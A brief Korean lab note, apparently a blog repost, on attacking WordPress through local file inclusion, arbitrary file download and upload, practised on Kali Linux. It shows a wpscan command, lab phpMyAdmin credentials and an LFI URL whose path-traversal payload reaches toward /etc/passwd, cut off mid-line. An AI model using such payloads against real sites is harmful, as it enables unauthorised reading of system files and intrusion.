WordPress 취약점 공격 - LFI, AFD, AFU

원문 : https://condencia.postype.com/post/2402942원문 등록 일시 : 2018.09.04 실습환경 : Kali Linux· wpscan : WordPress 취약점을 진단해주는 툴 1root@kali:/ wpscan -u [IP address]:7070/wordpress cs 19192.168.86.129:7070/phpmyadmin 접속계정명 : root, 비밀번호 : server · LFI(Local File Inclusion) : 로컬 서버에 있는 파일을 실행에 포함시킴https://www.exploit-db.com/exploits/40850 1http://[server IP address]:7070/wordpress?wpv-image=../../../etc/pas..